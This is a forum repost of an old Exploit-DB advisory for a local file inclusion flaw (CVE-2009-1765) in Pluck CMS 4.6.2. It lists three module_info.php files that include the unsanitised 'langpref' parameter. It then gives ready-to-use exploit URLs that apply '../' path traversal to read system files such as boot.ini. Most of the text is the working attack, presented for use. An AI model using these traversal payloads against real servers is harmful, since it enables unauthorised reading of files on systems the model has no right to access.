Exploit Pluck CMS 4.6.2 - 'langpref' Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8715
Проверка EDB
  1. Пройдено
Автор
AHMADBADY
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-1765
Дата публикации
2009-05-18
Код:
                =-=-local file include-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script::pluck version 4.6.2
-------------------------------------------------
Author: ahmadbady
my site :Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.pluck-cms.org/?file=kop2.php

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
vul:/data/modules/contactform/module_info.php

include ("data/inc/lang/$langpref"); line 13
--
vul:/data/modules/blog/module_info.php
include ("data/inc/lang/$langpref"); line 13
--
vyl:/data/modules/albums/module_info.php
include ("data/inc/lang/$langpref"); line 13
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=
xpl:
path/data/modules/contactform/module_info.php?langpref=../../../../../boot.ini
path/data/modules/blog/module_info.php?langpref=../../../../../boot.ini
path/data/modules/albums/module_info.php?langpref=../../../../../boot.ini
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=--=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=

# milw0rm.com [2009-05-18]
 
Источник
www.exploit-db.com

Похожие темы